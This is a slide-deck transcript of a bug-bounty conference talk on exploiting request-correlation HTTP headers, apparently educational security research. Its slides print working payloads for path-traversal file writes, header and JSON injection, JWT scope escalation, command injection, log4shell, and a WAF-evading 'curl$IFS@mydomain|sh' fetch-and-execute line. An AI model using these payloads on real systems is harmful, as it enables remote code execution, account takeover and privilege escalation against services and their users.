X-Correlation Injections (or How to break server-side contexts)

Transcript

1. Frans Rosén, @fransrosen, Midnight Sun 2024 HELLO

2. Frans Rosén, @fransrosen, Midnight Sun 2024 x-correlation inject"},"ion":"s or How

   to break server-side contexts

3. Frans Rosén @fransrosen • Full-time bug hunter • Listen to

   YTCracker - Green Hat • Collab with @avlidienbrunn • I like live-hacking events

4. Frans Rosén @fransrosen • Full-time bug hunter • Listen to

   YTCracker - Green Hat • Collab with @avlidienbrunn • I like live-hacking events

5. Walkthrough • Struggle disclaimer • Request correlation • Server-side JSON-injections

   • OOB RCE / "Blind RCE"

6. Struggle disclaimer Sounds easy. It wasn't. This is the happy

   path.

7. Hunting server-side bugs

8. Hunting server-side bugs Challenge: How to reach deep?

9. 🥁

10. x-correlation! https://en.wikipedia.org/wiki/List_of_HTTP_header_ fi elds

11. x-correlation concept https://hackernoon.com/how-to-work-with-request-id-in-net-applications

12. No standard

13. No standard • x-request-id • x-requestid • request-id • x-correlation-id

    • x-correlationid • x-company-correlation-id • x-company-request-id • x-trace-id • interactionid • x-unique-id • activity-id • x-activity-id • service-transaction-id • ...

14. Finding the right one

15. Finding the right one Might show up in response:

16. Finding the right one Might show up in response: Might

    show up in ACAH:

17. Reflection is a good indicator

18. Reflection is a good indicator Now what?

19. Fuzz!

20. Fuzz, but for what?

21. Fuzz, but for what? • Problem: Don't know context we

    end up in

22. Fuzz, but for what? • Problem: Don't know context we

    end up in • Solution: Multiple tactics, blind or trigger error

23. 1. Fuzz by trigger errors

24. 1. Fuzz by trigger errors ALL ZE CHARACTERS
 
 x-request-id:

    ' " % & > [ ${ $( ` ; \

25. 1. Fuzz by trigger errors ALL ZE CHARACTERS
 
 x-request-id:

    ' " % & > [ ${ $( ` ; \ Do regular testing while having it there

26. 1. Fuzz by trigger errors ALL ZE CHARACTERS
 
 x-request-id:

    ' " % & > [ ${ $( ` ; \ Do regular testing while having it there Weird things happen occasionally:

27. 1. Fuzz by trigger errors ALL ZE CHARACTERS
 
 x-request-id:

    ' " % & > [ ${ $( ` ; \ Do regular testing while having it there Weird things happen occasionally: FUN! NOW
 LET'S UNDERSTAND
 WHY/WHAT

28. False positives

29. False positives • Request-ID is validated against a pattern, for

    example:
 
 ^[a-f0-9-]{36}$

30. False positives • Request-ID is validated against a pattern, for

    example:
 
 ^[a-f0-9-]{36}$ • Request-ID not allowed at all

31. Struggle disclaimer #2 We had no idea at fi rst.

32. What we found

33. What we found Path traverse / arbitrary fi le write


    


34. What we found Path traverse / arbitrary fi le write


    
 x-request-id: 123-456-789

35. What we found Path traverse / arbitrary fi le write


    
 x-request-id: 123-456-789
 
 Dumped metrics to /tmp/trace-data/123-456-789 containing the request-id itself

36. What we found Path traverse / arbitrary fi le write


    
 x-request-id: ../../../../var/www/html/<?=phpinfo()?>.php

37. What we found Path traverse / arbitrary fi le write


    
 x-request-id: ../../../../var/www/html/<?=phpinfo()?>.php
 
 Dumped metrics to /tmp/trace-data/${requestId} containing the request-id itself

38. Path traverse / arbitrary fi le write
 
 x-request-id: ../../../../var/www/html/<?=phpinfo()?>.php


    
 Dumped metrics to /tmp/trace-data/${requestId} containing the request-id itself What we found

39. Path traverse / arbitrary fi le write
 
 x-request-id: ../../../../var/www/html/<?=phpinfo()?>.php


    
 Dumped metrics to /tmp/trace-data/${requestId} containing the request-id itself What we found

40. What we found Header-injection
 


41. What we found Header-injection
 
 x-request-id: 1%0d%0ax-account: 456

42. What we found Header-injection
 
 x-request-id: 1%0d%0ax-account: 456
 
 Request

    fl ow becomes:
 Client req w/ x-request-id -> API proxy w/ header injected -> Backend service


43. What we found Header-injection
 
 x-request-id: 1%0d%0ax-account: 456
 
 Request

    fl ow becomes:
 Client req w/ x-request-id -> API proxy w/ header injected -> Backend service
 
 GET /backend-service
 Host: internal
 x-request-id: 1
 x-account: 456
 x-account: 123

44. What we found Header-injection
 
 x-request-id: 1%0d%0ax-account: 456
 
 Request

    fl ow becomes:
 Client req w/ x-request-id -> API proxy w/ header injected -> Backend service
 
 GET /backend-service
 Host: internal
 x-request-id: 1
 x-account: 456
 x-account: 123 Account 456 fetched instead!

45. What we found Header-injection with Java (\u010d -> \u000d)
 


    x-request-id: 1%c4%8d%c4%8anew-header: foo
 


46. What we found Header-injection with Java (\u010d -> \u000d)
 


    x-request-id: 1%c4%8d%c4%8anew-header: foo
 
 
 GET /backend-service
 Host: internal
 x-request-id: 1
 new-header: foo
 Connection: close

47. What we found https://x.com/irsdl/status/1338097015188819969 Header-injection with Java (\u010d -> \u000d),

    thank you @irsdl!
 
 x-request-id: 1%c4%8d%c4%8anew-header: foo
 
 
 GET /backend-service
 Host: internal
 x-request-id: 1
 new-header: foo
 Connection: close

48. What we found Plain and simple OS-command injection
 


49. What we found Plain and simple OS-command injection
 
 x-request-id:

    $(id)

50. What we found Plain and simple OS-command injection
 
 x-request-id:

    $(id)

51. What we found JSON-injection
 


52. What we found JSON-injection
 
 x-request-id: 1"},"payload":{"account":"456","foo":"

53. What we found JSON-injection
 
 x-request-id: 1"},"payload":{"account":"456","foo":" Request fl ow

    becomes:
 Client req w/ x-request-id -> API proxy w/ JSON-inj -> Backend service


54. What we found JSON-injection
 
 x-request-id: 1"},"payload":{"account":"456","foo":" Request fl ow

    becomes:
 Client req w/ x-request-id -> API proxy w/ JSON-inj -> Backend service
 
 POST /backend-service
 Host: internal
 
 {
 "payload":{"account":"123"},
 "context":{"request-id":"1"},"payload":{"account":"456","foo":""}}

55. What we found JSON-injection
 
 x-request-id: 1"},"payload":{"account":"456","foo":" Request fl ow

    becomes:
 Client req w/ x-request-id -> API proxy w/ JSON-inj -> Backend service
 
 POST /backend-service
 Host: internal
 
 {
 "payload":{"account":"123"},
 "context":{"request-id":"1"},"payload":{"account":"456","foo":""}}

56. What we found JSON-injection
 
 x-request-id: 1"},"payload":{"account":"456","foo":" Request fl ow

    becomes:
 Client req w/ x-request-id -> API proxy w/ JSON-inj -> Backend service
 
 POST /backend-service
 Host: internal
 
 {
 "payload":{"account":"123"},
 "context":{"request-id":"1"},"payload":{"account":"456","foo":""}} Account 456 fetched instead!

57. Server-side JSON-injection A quick "How to"

58. Server-side JSON-injection • Di ff erence between " (error) and

    \" (ok)

59. Server-side JSON-injection • Di ff erence between " (error) and

    \" (ok) • Figure out where you are in the context

60. Server-side JSON-injection • Di ff erence between " (error) and

    \" (ok) • Figure out where you are in the context
 


61. Server-side JSON-injection • Di ff erence between " (error) and

    \" (ok) • Figure out where you are in the context • Does it allow premature ending?
 


62. Server-side JSON-injection • Di ff erence between " (error) and

    \" (ok) • Figure out where you are in the context • Does it allow premature ending?
 
 id: 1"}x}} -> Error 
 id: 1"}}x} -> Error
 id: 1"}}}x -> premature ending OK

63. Server-side JSON-injection • Di ff erence between " (error) and

    \" (ok) • Figure out where you are in the context • Does it allow premature ending?
 
 id: 1"}x}} -> Error 
 id: 1"}}x} -> Error
 id: 1"}}}x -> premature ending OK • Does it allow duplicate properties?

64. Server-side JSON-injection • Duplicate properties disallowed? Multiple injection points?

65. Server-side JSON-injection • Duplicate properties disallowed? Multiple injection points? 


    
 Payload 1: 1","foo":{"foo":"
 Payload 2: "},"id":"4567
 
 


66. Server-side JSON-injection • Duplicate properties disallowed? Multiple injection points? 


    
 Payload 1: 1","foo":{"foo":"
 Payload 2: "},"id":"4567
 
 Injections:
 {
 "req-id":"INJECTION 1",
 "id":"1234",
 "trace":""INJECTION 2"
 }


67. Server-side JSON-injection • Duplicate properties disallowed? Multiple injection points? 


    
 Payload 1: 1","foo":{"foo":"
 Payload 2: "},"id":"4567
 
 Injections:
 {
 "req-id":"1","foo":{"foo":"",
 "id":"1234",
 "trace":""},"id":"4567"
 }


68. Server-side JSON-injection • Duplicate properties disallowed? Multiple injection points? 


    
 Payload 1: 1","foo":{"foo":"
 Payload 2: "},"id":"4567
 
 Injections:
 {
 "req-id":"1","foo":{"foo":"",
 "id":"1234",
 "trace":""},"id":"4567"
 }
 Result:

69. Server-side JSON-injection • Duplicate properties disallowed? Multiple injection points? 


    
 Payload 1: 1","foo":{"foo":"
 Payload 2: "},"id":"4567
 
 Injections:
 {
 "req-id":"1","foo":{"foo":"",
 "id":"1234",
 "trace":""},"id":"4567"
 }
 Result:

70. Other places to look for it • S3-upload policies
 


71. Other places to look for it • S3-upload policies (@avlidienbrunn

    found this a few years before me)
 


72. Other places to look for it • S3-upload policies (@avlidienbrunn

    found this a few years before me)
 
 


73. Other places to look for it • S3-upload policies (@avlidienbrunn

    found this a few years before me)
 
 


74. Other places to look for it • S3-upload policies (@avlidienbrunn

    found this a few years before me)
 
 


75. Other places to look for it • S3-upload policies (@avlidienbrunn

    found this a few years before me)
 
 
 Quirk:
 Arbitrary fi elds not allowed.
 "Conditions" is allowed but ignored

76. Other places to look for it • S3-upload policies •

    JWT

77. Other places to look for it • S3-upload policies •

    JWT
 
 {"jti":"...","iss":"web","scope":"read","user":"frans"}
 


78. Other places to look for it • S3-upload policies •

    JWT
 
 {"jti":"...","iss":"web","scope":"read","user":"frans"}
 
 Username: frans","scope":"admin


79. Other places to look for it • S3-upload policies •

    JWT
 
 {"jti":"...","iss":"web","scope":"read","user":"frans"}
 
 Username: frans","scope":"admin
 
 Result:
 
 {"jti":"...","iss":"web","scope":"read","user":"frans","scope":"admin"}

80. 2. Fuzz blindly

81. 2. Fuzz blindly We need Out-of-Band triggers to know


82. 2. Fuzz blindly We need Out-of-Band triggers to know
 


    x-request-id: BLIND XSS
 x-request-id: OOB RCE / BLIND RCE
 x-request-id: SQL inj with DNS
 x-request-id: log4shell
 x-request-id: make your own adventure

83. What we found

84. What we found log4shell
 


85. What we found log4shell
 
 x-request-id: ${jndi:rmi://x${sys:java.version}.mydomain/a}

86. What we found log4shell
 
 x-request-id: ${jndi:rmi://x${sys:java.version}.mydomain/a}

87. What we found OOB RCE
 


88. What we found OOB RCE
 
 x-request-id: |ping `whoami`.mydomain.&

89. What we found OOB RCE
 
 x-request-id: |ping `whoami`.mydomain.& ~240

    minutes later:
90. None

91. Optimizing OOB/Blind RCE Support multiple contexts

92. Optimizing OOB/Blind RCE

93. Optimizing OOB/Blind RCE • As few special chars as possible

94. Optimizing OOB/Blind RCE • As few special chars as possible

    • Support:
 
 $ `foo injection`
 $ foo 'injection'
 $ foo "injection"
 $ foo injection

95. Optimizing OOB/Blind RCE • As few special chars as possible

    • Support:
 
 $ `foo injection`
 $ foo 'injection'
 $ foo "injection"
 $ foo injection • Collect data when triggered

96. Optimizing OOB/Blind RCE • ${IFS} often captured by WAF, $IFS

    is not?

97. Optimizing OOB/Blind RCE • ${IFS} often captured by WAF, $IFS

    is not? • Avoid spaces

98. Optimizing OOB/Blind RCE • ${IFS} often captured by WAF, $IFS

    is not? • Avoid spaces Result:

99. Optimizing OOB/Blind RCE • ${IFS} often captured by WAF, $IFS

    is not? • Avoid spaces Result: '`curl$IFS@mydomain|sh`'$(curl$IFS@mydomain|sh)

100. Unique payloads • Know when/where/how you sent each payload

101. Unique payloads • Know when/where/how you sent each payload •

     Poor man's generator:

102. Unique payloads • Know when/where/how you sent each payload •

     Poor man's generator:

103. Unique payloads • Know when/where/how you sent each payload •

     Poor man's generator:

104. Collection script

105. Collection script If user-agent is curl:

106. Collection script If user-agent is curl: Alert when it happens:

107. Did it work?

108. Did it work? YES

109. Did it work? YES

110. Conclusion • Correlation headers expands attack surface

111. Conclusion • Correlation headers expands attack surface • Fuzz using

     errors and blind

112. Conclusion • Correlation headers expands attack surface • Fuzz using

     errors and blind • JSON-injection more common than expected

113. Conclusion • Correlation headers expands attack surface • Fuzz using

     errors and blind • JSON-injection more common than expected • Let me know if you fi nd a new context to inject into!

114. Frans Rosén, @fransrosen, Midnight Sun 2024 Thank you! Any Q?

     x-correlation inject"},"ion":"s or How to break server-side contexts